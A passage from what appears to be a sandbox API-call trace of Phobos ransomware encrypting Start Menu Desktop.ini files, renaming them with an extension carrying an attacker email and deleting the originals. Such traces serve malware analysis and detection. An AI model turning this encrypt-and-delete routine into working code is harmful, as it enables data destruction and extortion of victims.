halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.832] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.832] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.833] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.834] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.834] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.834] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2a6, lpOverlapped=0x0) returned 1 [0194.834] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2b0, dwBufLen=0x2b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2b0) returned 1 [0194.835] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2b0, lpOverlapped=0x0) returned 1 [0194.835] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0194.835] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.835] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0194.835] CryptDestroyKey (hKey=0xa32d28) returned 1 [0194.835] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0194.836] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.836] CloseHandle (hObject=0x14c) returned 1 [0194.836] CloseHandle (hObject=0x134) returned 1 [0194.893] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini")) returned 1 [0194.894] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.895] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=738) returned 1 [0194.895] CloseHandle (hObject=0x134) returned 1 [0194.895] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini")) returned 0x6 [0194.895] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.895] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.895] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.897] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.897] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.897] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2e2, lpOverlapped=0x0) returned 1 [0194.897] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2f0, dwBufLen=0x2f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2f0) returned 1 [0194.897] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2f0, lpOverlapped=0x0) returned 1 [0194.898] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0194.898] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.898] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0194.898] CryptDestroyKey (hKey=0xa32d28) returned 1 [0194.898] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0194.898] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.898] CloseHandle (hObject=0x134) returned 1 [0194.898] CloseHandle (hObject=0x14c) returned 1 [0194.898] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini")) returned 1 [0194.899] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.899] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.900] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=174) returned 1 [0194.900] CloseHandle (hObject=0x14c) returned 1 [0194.900] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini")) returned 0x6 [0194.900] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.900] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.900] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.901] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.901] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.901] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xae, lpOverlapped=0x0) returned 1 [0194.901] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0194.901] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0194.902] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0194.902] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.902] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0194.902] CryptDestroyKey (hKey=0xa32d28) returned 1 [0194.902] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0194.902] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.902] CloseHandle (hObject=0x14c) returned 1 [0194.902] CloseHandle (hObject=0x134) returned 1 [0194.903] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini")) returned 1 [0194.906] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.907] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=476) returned 1 [0194.907] CloseHandle (hObject=0x178) returned 1 [0194.907] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini")) returned 0x6 [0194.907] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.907] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.907] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.908] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.908] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.908] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1dc, lpOverlapped=0x0) returned 1 [0194.908] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1e0) returned 1 [0194.908] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1e0, lpOverlapped=0x0) returned 1 [0194.909] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0194.909] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.909] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0194.909] CryptDestroyKey (hKey=0xa32d28) returned 1 [0194.909] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0194.909] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.909] CloseHandle (hObject=0x178) returned 1 [0194.909] CloseHandle (hObject=0x194) returned 1 [0194.909] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini")) returned 1 [0194.910] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.910] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=318) returned 1 [0194.910] CloseHandle (hObject=0x194) returned 1 [0194.910] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini")) returned 0x26 [0194.911] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.911] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.911] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.911] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.911] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.911] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x13e, lpOverlapped=0x0) returned 1 [0194.911] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x140, dwBufLen=0x140 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x140) returned 1 [0194.912] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x140, lpOverlapped=0x0) returned 1 [0194.912] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0194.912] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.912] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0194.912] CryptDestroyKey (hKey=0xa32d28) returned 1 [0194.912] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0194.913] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.913] CloseHandle (hObject=0x194) returned 1 [0194.913] CloseHandle (hObject=0x178) returned 1 [0194.913] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini")) returned 1 [0194.914] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.914] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=174) returned 1 [0194.914] CloseHandle (hObject=0x178) 